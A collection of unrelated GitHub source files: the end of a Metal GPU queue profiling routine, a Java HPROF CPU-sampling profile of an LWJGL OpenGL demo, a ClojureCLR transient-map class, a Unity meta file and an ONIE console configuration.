cend(cmd_buffers)) { log_error("failed to find metal command buffer %X!", buffer); return; } if (iter->second && can_do_profiling) { __unsafe_unretained id <MTLCommandBufferProfiling> prof_buffer = (id <MTLCommandBufferProfiling>)buffer; const auto elapsed_time = ([prof_buffer GPUEndTime] - [prof_buffer GPUStartTime]); profiling_sum += uint64_t(elapsed_time * 1000000.0); } // else: nothing to do here cmd_buffers.erase(iter); }]; { GUARD(cmd_buffers_lock); cmd_buffers.emplace_back(cmd_buffer, is_profiling); } return cmd_buffer; } void metal_queue::start_profiling() { if (!can_do_profiling) { // fallback to host side profiling compute_queue::start_profiling(); return; } // signal new buffers that we're profiling is_profiling = true; } uint64_t metal_queue::stop_profiling() { if (!can_do_profiling) { // fallback to host side profiling return compute_queue::stop_profiling(); } // wait on all buffers finish(); const uint64_t ret = profiling_sum; // clear profiling_sum = 0; is_profiling = false; return ret; } #endif
{ "pile_set_name": "Github" }
JAVA PROFILE 1.0.1, created Thu Jul 22 14:15:03 2004 Header for -Xhprof ASCII Output Copyright 1998 Sun Microsystems, Inc. 901 San Antonio Road, Palo Alto, California, 94303, U.S.A. All Rights Reserved. WARNING! This file format is under development, and is subject to change without notice. This file contains the following types of records: THREAD START THREAD END mark the lifetime of Java threads TRACE represents a Java stack trace. Each trace consists of a series of stack frames. Other records refer to TRACEs to identify (1) where object allocations have taken place, (2) the frames in which GC roots were found, and (3) frequently executed methods. HEAP DUMP is a complete snapshot of all live objects in the Java heap. Following distinctions are made: ROOT root set as determined by GC CLS classes OBJ instances ARR arrays SITES is a sorted list of allocation sites. This identifies the most heavily allocated object types, and the TRACE at which those allocations occurred. CPU SAMPLES is a statistical profile of program execution. The VM periodically samples all running threads, and assigns a quantum to active TRACEs in those threads. Entries in this record are TRACEs ranked by the percentage of total quanta they consumed; top-ranked TRACEs are typically hot spots in the program. CPU TIME is a profile of program execution obtained by measuring the time spent in individual methods (excluding the time spent in callees), as well as by counting the number of times each method is called. Entries in this record are TRACEs ranked by the percentage of total CPU time. The "count" field indicates the number of times each TRACE is invoked. MONITOR TIME is a profile of monitor contention obtained by measuring the time spent by a thread waiting to enter a monitor. Entries in this record are TRACEs ranked by the percentage of total monitor contention time and a brief description of the monitor. The "count" field indicates the number of times the monitor was contended at that TRACE. MONITOR DUMP is a complete snapshot of all the monitors and threads in the System. HEAP DUMP, SITES, CPU SAMPLES|TIME and MONITOR DUMP|TIME records are generated at program exit. They can also be obtained during program execution by typing Ctrl-\ (on Solaris) or by typing Ctrl-Break (on Win32). -------- THREAD START (obj=2b570f0, id = 1, name="Finalizer", group="system") THREAD START (obj=2b571f8, id = 2, name="Reference Handler", group="system") THREAD START (obj=2b572d8, id = 3, name="main", group="main") THREAD START (obj=2b5a030, id = 4, name="HPROF CPU profiler", group="system") THREAD START (obj=2b5a138, id = 5, name="Signal Dispatcher", group="system") THREAD START (obj=2d04630, id = 6, name="AWT-Shutdown", group="main") THREAD START (obj=2d05160, id = 7, name="AWT-Windows", group="main") THREAD START (obj=2d10698, id = 8, name="Image Fetcher 0", group="main") THREAD START (obj=2d38b80, id = 9, name="Java2D Disposer", group="main") THREAD END (id = 6) THREAD END (id = 3) THREAD START (obj=2b57320, id = 10, name="DestroyJavaVM", group="main") THREAD END (id = 10) TRACE 5: <empty> TRACE 17: java.util.zip.Inflater.inflate(<Unknown>:Unknown line) java.util.zip.InflaterInputStream.read(<Unknown>:Unknown line) sun.misc.Resource.getBytes(<Unknown>:Unknown line) java.net.URLClassLoader.defineClass(<Unknown>:Unknown line) TRACE 10: org.lwjgl.opengl.Window.<clinit>(<Unknown>:Unknown line) Lesson11.createWindow(Lesson11.java:180) Lesson11.init(Lesson11.java:184) Lesson11.run(Lesson11.java:68) TRACE 24: org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) Lesson11.createWindow(Lesson11.java:180) TRACE 9: sun.nio.cs.UTF_8.newDecoder(<Unknown>:Unknown line) java.lang.StringCoding$CharsetSD.<init>(<Unknown>:Unknown line) java.lang.StringCoding$CharsetSD.<init>(<Unknown>:Unknown line) java.lang.StringCoding.decode(<Unknown>:Unknown line) TRACE 21: org.lwjgl.opengl.Util.<clinit>(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.setCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) TRACE 63: org.lwjgl.Display.init(<Unknown>:Native method) org.lwjgl.Display.<clinit>(<Unknown>:Unknown line) Lesson11.initGL(Lesson11.java:213) Lesson11.init(Lesson11.java:189) TRACE 45: sun.awt.SunToolkit.getPrivateKey(<Unknown>:Native method) sun.awt.SunToolkit.insertTargetMapping(<Unknown>:Unknown line) java.awt.Component.<init>(<Unknown>:Unknown line) javax.swing.ImageIcon$1.<init>(<Unknown>:Unknown line) TRACE 3: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$FileLoader.getResource(<Unknown>:Unknown line) sun.misc.URLClassPath.getResource(<Unknown>:Unknown line) TRACE 71: org.lwjgl.opengl.GL11.glVertex3f(<Unknown>:Native method) Lesson11.render(Lesson11.java:136) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 25: org.lwjgl.input.Mouse.nCreate(<Unknown>:Native method) org.lwjgl.input.Mouse.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 20: org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.setCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) TRACE 1: java.util.zip.ZipFile.open(<Unknown>:Native method) java.util.zip.ZipFile.<init>(<Unknown>:Unknown line) java.util.jar.JarFile.<init>(<Unknown>:Unknown line) java.util.jar.JarFile.<init>(<Unknown>:Unknown line) TRACE 74: org.lwjgl.opengl.GL11.glVertex3f(<Unknown>:Native method) Lesson11.render(Lesson11.java:142) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 59: sun.awt.image.ByteComponentRaster.<init>(<Unknown>:Unknown line) sun.awt.image.ByteInterleavedRaster.<init>(<Unknown>:Unknown line) sun.awt.image.ByteInterleavedRaster.<init>(<Unknown>:Unknown line) java.awt.image.Raster.createInterleavedRaster(<Unknown>:Unknown line) TRACE 23: org.lwjgl.opengl.GL11.nglGetIntegerv(<Unknown>:Native method) org.lwjgl.opengl.GL11.glGetInteger(<Unknown>:Unknown line) org.lwjgl.opengl.Util.glGetInteger(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line) TRACE 56: sun.awt.SunToolkit.getImageFromHash(<Unknown>:Unknown line) sun.awt.SunToolkit.getImage(<Unknown>:Unknown line) javax.swing.ImageIcon.<init>(<Unknown>:Unknown line) javax.swing.ImageIcon.<init>(<Unknown>:Unknown line) TRACE 44: java.lang.String.substring(<Unknown>:Unknown line) java.io.Win32FileSystem.parentOrNull(<Unknown>:Unknown line) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) TRACE 15: org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 76: org.lwjgl.opengl.GL11.glClear(<Unknown>:Native method) Lesson11.render(Lesson11.java:116) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 12: org.lwjgl.Sys.initialize(<Unknown>:Unknown line) org.lwjgl.Sys.<clinit>(<Unknown>:Unknown line) org.lwjgl.opengl.Window.<clinit>(<Unknown>:Unknown line) Lesson11.createWindow(Lesson11.java:180) TRACE 11: java.lang.String.lastIndexOf(<Unknown>:Unknown line) java.lang.String.lastIndexOf(<Unknown>:Unknown line) java.net.URLClassLoader.defineClass(<Unknown>:Unknown line) java.net.URLClassLoader.access$100(<Unknown>:Unknown line) TRACE 50: sun.awt.windows.Win32SurfaceData.initDDraw(<Unknown>:Native method) sun.awt.windows.Win32SurfaceData.<clinit>(<Unknown>:Unknown line) sun.awt.windows.D3DBlitLoops.register(<Unknown>:Unknown line) sun.awt.windows.Win32OffScreenSurfaceData.initD3D(<Unknown>:Unknown line) TRACE 26: java.util.HashMap.addEntry(<Unknown>:Unknown line) java.util.HashMap.put(<Unknown>:Unknown line) org.lwjgl.input.Keyboard.<clinit>(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) TRACE 79: org.lwjgl.opengl.Window.nDestroy(<Unknown>:Native method) org.lwjgl.opengl.Window.destroy(<Unknown>:Unknown line) Lesson11.cleanup(Lesson11.java:222) Lesson11.run(Lesson11.java:74) TRACE 69: Lesson11.render(Lesson11.java:135) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 78: org.lwjgl.input.Mouse.nDestroy(<Unknown>:Native method) org.lwjgl.input.Mouse.destroy(<Unknown>:Unknown line) org.lwjgl.opengl.Window.destroy(<Unknown>:Unknown line) Lesson11.cleanup(Lesson11.java:222) TRACE 16: org.lwjgl.opengl.GLContext.init(<Unknown>:Native method) org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) TRACE 72: org.lwjgl.input.Mouse.nPoll(<Unknown>:Native method) org.lwjgl.input.Mouse.poll(<Unknown>:Unknown line) org.lwjgl.opengl.Window.update(<Unknown>:Unknown line) Lesson11.run(Lesson11.java:72) TRACE 61: sun.awt.image.ImagingLib.transformBI(<Unknown>:Native method) sun.awt.image.ImagingLib.filter(<Unknown>:Unknown line) java.awt.image.AffineTransformOp.filter(<Unknown>:Unknown line) Lesson11.loadTexture(Lesson11.java:238) TRACE 58: sun.java2d.Disposer.initIDs(<Unknown>:Native method) sun.java2d.Disposer.<clinit>(<Unknown>:Unknown line) sun.awt.image.BufImgSurfaceData.initRaster(<Unknown>:Native method) sun.awt.image.BufImgSurfaceData.createDataBC(<Unknown>:Unknown line) TRACE 46: sun.java2d.SurfaceData.initIDs(<Unknown>:Native method) sun.java2d.SurfaceData.<clinit>(<Unknown>:Unknown line) sun.awt.windows.WToolkit.initIDs(<Unknown>:Native method) sun.awt.windows.WToolkit.<clinit>(<Unknown>:Unknown line) TRACE 31: sun.awt.Win32GraphicsEnvironment.registerFontWithPlatform(<Unknown>:Native method) sun.awt.Win32GraphicsEnvironment.registerFontsWithPlatform(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment$1.run(<Unknown>:Unknown line) java.security.AccessController.doPrivileged(<Unknown>:Native method) TRACE 35: sun.nio.cs.ISO_8859_1$Decoder.decodeArrayLoop(<Unknown>:Unknown line) sun.nio.cs.ISO_8859_1$Decoder.decodeLoop(<Unknown>:Unknown line) java.nio.charset.CharsetDecoder.decode(<Unknown>:Unknown line) sun.nio.cs.StreamDecoder$CharsetSD.implRead(<Unknown>:Unknown line) TRACE 53: sun.awt.windows.WToolkit.eventLoop(<Unknown>:Native method) sun.awt.windows.WToolkit.run(<Unknown>:Unknown line) java.lang.Thread.run(<Unknown>:Unknown line) TRACE 49: sun.awt.windows.Win32SurfaceData.initIDs(<Unknown>:Native method) sun.awt.windows.Win32SurfaceData.<clinit>(<Unknown>:Unknown line) sun.awt.windows.D3DBlitLoops.register(<Unknown>:Unknown line) sun.awt.windows.Win32OffScreenSurfaceData.initD3D(<Unknown>:Unknown line) TRACE 32: java.lang.StringBuffer.expandCapacity(<Unknown>:Unknown line) java.lang.StringBuffer.append(<Unknown>:Unknown line) java.io.Win32FileSystem.resolve(<Unknown>:Unknown line) java.io.File.<init>(<Unknown>:Unknown line) TRACE 4: java.io.FileInputStream.open(<Unknown>:Native method) java.io.FileInputStream.<init>(<Unknown>:Unknown line) sun.misc.URLClassPath$7.getInputStream(<Unknown>:Unknown line) sun.misc.Resource.getBytes(<Unknown>:Unknown line) TRACE 43: java.io.Win32FileSystem.normalize(<Unknown>:Unknown line) java.io.File.<init>(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontFile(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontPropertiesFonts(<Unknown>:Unknown line) TRACE 33: sun.awt.FontProperties.initializeProperties(<Unknown>:Unknown line) sun.awt.FontProperties.<init>(<Unknown>:Unknown line) sun.awt.windows.WFontProperties.<init>(<Unknown>:Unknown line) sun.awt.Win32GraphicsEnvironment.createFontProperties(<Unknown>:Unknown line) TRACE 42: java.lang.StringBuffer.<init>(<Unknown>:Unknown line) java.lang.StringBuffer.<init>(<Unknown>:Unknown line) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) TRACE 55: sun.awt.Win32GraphicsDevice.initIDs(<Unknown>:Native method) sun.awt.Win32GraphicsDevice.<clinit>(<Unknown>:Unknown line) sun.awt.Win32GraphicsEnvironment.makeScreenDevice(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.getScreenDevices(<Unknown>:Unknown line) TRACE 73: org.lwjgl.opengl.GL11.glTexCoord2f(<Unknown>:Native method) Lesson11.render(Lesson11.java:144) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 39: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) TRACE 37: sun.awt.font.NativeFontWrapper.registerFonts(<Unknown>:Native method) sun.java2d.SunGraphicsEnvironment.addPathFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.access$200(<Unknown>:Unknown line) TRACE 52: sun.awt.windows.WToolkit.init(<Unknown>:Native method) sun.awt.windows.WToolkit.run(<Unknown>:Unknown line) java.lang.Thread.run(<Unknown>:Unknown line) TRACE 13: java.lang.ClassLoader$NativeLibrary.load(<Unknown>:Native method) java.lang.ClassLoader.loadLibrary0(<Unknown>:Unknown line) java.lang.ClassLoader.loadLibrary(<Unknown>:Unknown line) java.lang.Runtime.loadLibrary0(<Unknown>:Unknown line) TRACE 62: Lesson11.initGL(Lesson11.java:213) Lesson11.init(Lesson11.java:189) Lesson11.run(Lesson11.java:68) Lesson11.main(Lesson11.java:63) TRACE 57: sun.awt.image.ImageFetcher.fetchloop(<Unknown>:Unknown line) sun.awt.image.ImageFetcher.run(<Unknown>:Unknown line) TRACE 68: org.lwjgl.opengl.GL11.glVertex3f(<Unknown>:Native method) Lesson11.render(Lesson11.java:145) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 47: java.lang.Class.forName0(<Unknown>:Native method) java.lang.Class.forName(<Unknown>:Unknown line) sun.java2d.loops.GraphicsPrimitiveMgr.class$(<Unknown>:Unknown line) sun.java2d.loops.GraphicsPrimitiveMgr.<clinit>(<Unknown>:Unknown line) TRACE 77: org.lwjgl.opengl.GL11.glLoadIdentity(<Unknown>:Native method) Lesson11.render(Lesson11.java:117) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 41: sun.awt.font.NativeFontWrapper.registerFonts(<Unknown>:Native method) sun.java2d.SunGraphicsEnvironment.registerFontFile(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontPropertiesFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.initTerminalNames(<Unknown>:Unknown line) TRACE 40: java.io.WinNTFileSystem.checkAccess(<Unknown>:Native method) java.io.File.canRead(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontFile(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.registerFontPropertiesFonts(<Unknown>:Unknown line) TRACE 64: org.lwjgl.opengl.GL11.nglTexImage2D(<Unknown>:Native method) org.lwjgl.opengl.GL11.glTexImage2D(<Unknown>:Unknown line) Lesson11.loadTexture(Lesson11.java:259) Lesson11.loadTextures(Lesson11.java:201) TRACE 36: java.io.WinNTFileSystem.canonicalize0(<Unknown>:Native method) java.io.Win32FileSystem.canonicalize(<Unknown>:Unknown line) java.io.File.getCanonicalPath(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.addPathFonts(<Unknown>:Unknown line) TRACE 51: sun.awt.windows.WToolkit.initIDs(<Unknown>:Native method) sun.awt.windows.WToolkit.<clinit>(<Unknown>:Unknown line) java.lang.Class.forName0(<Unknown>:Native method) java.lang.Class.forName(<Unknown>:Unknown line) TRACE 6: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) sun.misc.FileURLMapper.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$JarLoader.getJarFile(<Unknown>:Unknown line) TRACE 8: Lesson11.createWindow(Lesson11.java:180) Lesson11.init(Lesson11.java:184) Lesson11.run(Lesson11.java:68) Lesson11.main(Lesson11.java:63) TRACE 7: java.util.zip.ZipFile.getInputStream(<Unknown>:Unknown line) java.util.zip.ZipFile.getInputStream(<Unknown>:Unknown line) java.util.jar.JarFile.hasClassPathAttribute(<Unknown>:Unknown line) java.util.jar.JavaUtilJarAccessImpl.jarFileHasClassPathAttribute(<Unknown>:Unknown line) TRACE 67: Lesson11.render(Lesson11.java:136) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 70: Lesson11.render(Lesson11.java:142) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) TRACE 30: java.io.WinNTFileSystem.getBooleanAttributes(<Unknown>:Native method) java.io.File.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$FileLoader.getResource(<Unknown>:Unknown line) sun.misc.URLClassPath$FileLoader.findResource(<Unknown>:Unknown line) TRACE 34: sun.awt.SunToolkit.<clinit>(<Unknown>:Unknown line) sun.awt.FontProperties.initializeProperties(<Unknown>:Unknown line) sun.awt.FontProperties.<init>(<Unknown>:Unknown line) sun.awt.windows.WFontProperties.<init>(<Unknown>:Unknown line) TRACE 14: org.lwjgl.opengl.Window.nCreate(<Unknown>:Native method) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 48: sun.java2d.loops.GraphicsPrimitiveMgr.initIDs(<Unknown>:Native method) sun.java2d.loops.GraphicsPrimitiveMgr.<clinit>(<Unknown>:Unknown line) sun.java2d.loops.Blit.<clinit>(<Unknown>:Unknown line) sun.awt.windows.Win32OffScreenSurfaceData.initD3D(<Unknown>:Unknown line) TRACE 38: sun.java2d.SunGraphicsEnvironment.registerFonts(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment.access$200(<Unknown>:Unknown line) sun.java2d.SunGraphicsEnvironment$1.run(<Unknown>:Unknown line) java.security.AccessController.doPrivileged(<Unknown>:Native method) TRACE 28: sun.misc.JarIndex.addToList(<Unknown>:Unknown line) sun.misc.JarIndex.read(<Unknown>:Unknown line) sun.misc.JarIndex.<init>(<Unknown>:Unknown line) sun.misc.JarIndex.getJarIndex(<Unknown>:Unknown line) TRACE 60: sun.awt.image.ByteInterleavedRaster.putByteData(<Unknown>:Unknown line) sun.awt.image.ImageRepresentation.setPixels(<Unknown>:Unknown line) sun.awt.image.ImageDecoder.setPixels(<Unknown>:Unknown line) sun.awt.image.PNGImageDecoder.sendPixels(<Unknown>:Unknown line) TRACE 66: org.lwjgl.opengl.Window.swapBuffers(<Unknown>:Native method) org.lwjgl.opengl.Window.update(<Unknown>:Unknown line) Lesson11.run(Lesson11.java:72) Lesson11.main(Lesson11.java:63) TRACE 19: org.lwjgl.opengl.GLContext.useContext(<Unknown>:Unknown line) org.lwjgl.opengl.Window.makeCurrent(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 18: java.lang.CharacterDataLatin1.toLowerCase(<Unknown>:Unknown line) java.lang.Character.toLowerCase(<Unknown>:Unknown line) java.lang.String.regionMatches(<Unknown>:Unknown line) java.net.URL.<init>(<Unknown>:Unknown line) TRACE 54: java.io.FileInputStream.open(<Unknown>:Native method) java.io.FileInputStream.<init>(<Unknown>:Unknown line) java.awt.Toolkit$1.run(<Unknown>:Unknown line) java.security.AccessController.doPrivileged(<Unknown>:Native method) TRACE 2: sun.net.www.ParseUtil.decode(<Unknown>:Unknown line) sun.misc.FileURLMapper.getPath(<Unknown>:Unknown line) sun.misc.FileURLMapper.exists(<Unknown>:Unknown line) sun.misc.URLClassPath$JarLoader.getJarFile(<Unknown>:Unknown line) TRACE 27: org.lwjgl.input.Controller.nCreate(<Unknown>:Native method) org.lwjgl.input.Controller.create(<Unknown>:Unknown line) org.lwjgl.opengl.Window.createWindow(<Unknown>:Unknown line) org.lwjgl.opengl.Window.create(<Unknown>:Unknown line) TRACE 65: org.lwjgl.opengl.glu.GLU.gluPerspective(<Unknown>:Unknown line) Lesson11.initGL(Lesson11.java:213) Lesson11.init(Lesson11.java:189) Lesson11.run(Lesson11.java:68) TRACE 29: java.lang.StringBuffer.<init>(<Unknown>:Unknown line) java.lang.StringBuffer.<init>(<Unknown>:Unknown line) sun.net.www.ParseUtil.decode(<Unknown>:Unknown line) sun.misc.FileURLMapper.getPath(<Unknown>:Unknown line) TRACE 22: org.lwjgl.opengl.GL11.glGetInteger(<Unknown>:Unknown line) org.lwjgl.opengl.Util.glGetInteger(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.<init>(<Unknown>:Unknown line) org.lwjgl.opengl.VBOTracker.setCurrent(<Unknown>:Unknown line) TRACE 75: Lesson11.render(Lesson11.java:144) Lesson11.run(Lesson11.java:71) Lesson11.main(Lesson11.java:63) CPU SAMPLES BEGIN (total = 6006) Thu Jul 22 14:15:07 2004 rank self accum count trace method 1 49.22% 49.22% 2956 53 sun.awt.windows.WToolkit.eventLoop 2 48.27% 97.49% 2899 66 org.lwjgl.opengl.Window.swapBuffers 3 0.87% 98.35% 52 14 org.lwjgl.opengl.Window.nCreate 4 0.23% 98.58% 14 50 sun.awt.windows.Win32SurfaceData.initDDraw 5 0.10% 98.68% 6 79 org.lwjgl.opengl.Window.nDestroy 6 0.10% 98.78% 6 68 org.lwjgl.opengl.GL11.glVertex3f 7 0.08% 98.87% 5 41 sun.awt.font.NativeFontWrapper.registerFonts 8 0.07% 98.93% 4 31 sun.awt.Win32GraphicsEnvironment.registerFontWithPlatform 9 0.07% 99.00% 4 69 Lesson11.render 10 0.05% 99.05% 3 67 Lesson11.render 11 0.05% 99.10% 3 70 Lesson11.render 12 0.05% 99.15% 3 3 java.io.WinNTFileSystem.getBooleanAttributes 13 0.03% 99.18% 2 1 java.util.zip.ZipFile.open 14 0.03% 99.22% 2 73 org.lwjgl.opengl.GL11.glTexCoord2f 15 0.03% 99.25% 2 13 java.lang.ClassLoader$NativeLibrary.load 16 0.03% 99.28% 2 54 java.io.FileInputStream.open 17 0.03% 99.32% 2 76 org.lwjgl.opengl.GL11.glClear 18 0.02% 99.33% 1 44 java.lang.String.substring 19 0.02% 99.35% 1 60 sun.awt.image.ByteInterleavedRaster.putByteData 20 0.02% 99.37% 1 56 sun.awt.SunToolkit.getImageFromHash 21 0.02% 99.38% 1 28 sun.misc.JarIndex.addToList 22 0.02% 99.40% 1 11 java.lang.String.lastIndexOf 23 0.02% 99.42% 1 27 org.lwjgl.input.Controller.nCreate 24 0.02% 99.43% 1 26 java.util.HashMap.addEntry 25 0.02% 99.45% 1 9 sun.nio.cs.UTF_8.newDecoder 26 0.02% 99.47% 1 24 org.lwjgl.opengl.Window.createWindow 27 0.02% 99.48% 1 78 org.lwjgl.input.Mouse.nDestroy 28 0.02% 99.50% 1 16 org.lwjgl.opengl.GLContext.init 29 0.02% 99.52% 1 2 sun.net.www.ParseUtil.decode 30 0.02% 99.53% 1 38 sun.java2d.SunGraphicsEnvironment.registerFonts 31 0.02% 99.55% 1 29 java.lang.StringBuffer.<init> 32 0.02% 99.57% 1 34 sun.awt.SunToolkit.<clinit> 33 0.02% 99.58% 1 59 sun.awt.image.ByteComponentRaster.<init> 34 0.02% 99.60% 1 35 sun.nio.cs.ISO_8859_1$Decoder.decodeArrayLoop 35 0.02% 99.62% 1 17 java.util.zip.Inflater.inflate 36 0.02% 99.63% 1 30 java.io.WinNTFileSystem.getBooleanAttributes 37 0.02% 99.65% 1 32 java.lang.StringBuffer.expandCapacity 38 0.02% 99.67% 1 4 java.io.FileInputStream.open 39 0.02% 99.68% 1 43 java.io.Win32FileSystem.normalize 40 0.02% 99.70% 1 75 Lesson11.render 41 0.02% 99.72% 1 42 java.lang.StringBuffer.<init> 42 0.02% 99.73% 1 74 org.lwjgl.opengl.GL11.glVertex3f 43 0.02% 99.75% 1 18 java.lang.CharacterDataLatin1.toLowerCase 44 0.02% 99.77% 1 39 java.io.WinNTFileSystem.getBooleanAttributes 45 0.02% 99.78% 1 37 sun.awt.font.NativeFontWrapper.registerFonts 46 0.02% 99.80% 1 52 sun.awt.windows.WToolkit.init 47 0.02% 99.82% 1 25 org.lwjgl.input.Mouse.nCreate 48 0.02% 99.83% 1 71 org.lwjgl.opengl.GL11.glVertex3f 49 0.02% 99.85% 1 57 sun.awt.image.ImageFetcher.fetchloop 50 0.02% 99.87% 1 72 org.lwjgl.input.Mouse.nPoll 51 0.02% 99.88% 1 47 java.lang.Class.forName0 52 0.02% 99.90% 1 77 org.lwjgl.opengl.GL11.glLoadIdentity 53 0.02% 99.92% 1 33 sun.awt.FontProperties.initializeProperties 54 0.02% 99.93% 1 40 java.io.WinNTFileSystem.checkAccess 55 0.02% 99.95% 1 64 org.lwjgl.opengl.GL11.nglTexImage2D 56 0.02% 99.97% 1 36 java.io.WinNTFileSystem.canonicalize0 57 0.02% 99.98% 1 7 java.util.zip.ZipFile.getInputStream 58 0.02% 100.00% 1 6 java.io.WinNTFileSystem.getBooleanAttributes CPU SAMPLES END
{ "pile_set_name": "Github" }
/** * Copyright (c) Rich Hickey. All rights reserved. * The use and distribution terms for this software are covered by the * Eclipse Public License 1.0 (http://opensource.org/licenses/eclipse-1.0.php) * which can be found in the file epl-v10.html at the root of this distribution. * By using this software in any fashion, you are agreeing to be bound by * the terms of this license. * You must not remove this notice, or any other, from this software. **/ /** * Author: David Miller **/ using System; using System.Collections; namespace clojure.lang { abstract class ATransientMap : AFn, ITransientMap { #region Methods to be supplied by derived classes abstract protected void EnsureEditable(); abstract protected ITransientMap doAssoc(object key, object val); abstract protected ITransientMap doWithout(object key); abstract protected object doValAt(object key, object notFound); abstract protected int doCount(); abstract protected IPersistentMap doPersistent(); #endregion IPersistentCollection ITransientCollection.persistent() { return persistent(); } ITransientCollection ITransientCollection.conj(object val) { return conj(val); } ITransientAssociative ITransientAssociative.assoc(object key, object val) { return assoc(key, val); } public ITransientMap conj(object val) { EnsureEditable(); { IMapEntry e = val as IMapEntry; if (e != null) return assoc(e.key(), e.val()); } if (val is DictionaryEntry) { DictionaryEntry de = (DictionaryEntry)val; return assoc(de.Key, de.Value); } { IPersistentVector v = val as IPersistentVector; if (v != null) { if (v.count() != 2) throw new ArgumentException("Vector arg to map conj must be a pair"); return assoc(v.nth(0), v.nth(1)); } } // TODO: also handle KeyValuePair? ITransientMap ret = this; for (ISeq es = RT.seq(val); es != null; es = es.next()) { IMapEntry e = (IMapEntry)es.first(); ret = ret.assoc(e.key(), e.val()); } return ret; } #region IFn overloads public override object invoke(object arg1) { return valAt(arg1); } public override object invoke(object arg1, object arg2) { return valAt(arg1, arg2); } #endregion public object valAt(object key) { return valAt(key, null); } public object valAt(object key, object notFound) { EnsureEditable(); return doValAt(key, notFound); } public ITransientMap assoc(object key, object val) { EnsureEditable(); return doAssoc(key, val); } public ITransientMap without(object key) { EnsureEditable(); return doWithout(key); } public IPersistentMap persistent() { EnsureEditable(); return doPersistent(); } public int count() { EnsureEditable(); return doCount(); } } }
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: 94399ff0195a6ea42abcc5188df5ed67 timeCreated: 1502438559 licenseType: Pro MonoImporter: serializedVersion: 2 defaultReferences: [] executionOrder: 0 icon: {instanceID: 0} userData: assetBundleName: assetBundleVariant:
{ "pile_set_name": "Github" }
CONSOLE_PORT=0x3f8 CONSOLE_DEV=0 CONSOLE_SPEED=115200 ONIE_PLATFORM_EXTRA_CMDLINE_LINUX="pci=noaer"
{ "pile_set_name": "Github" }
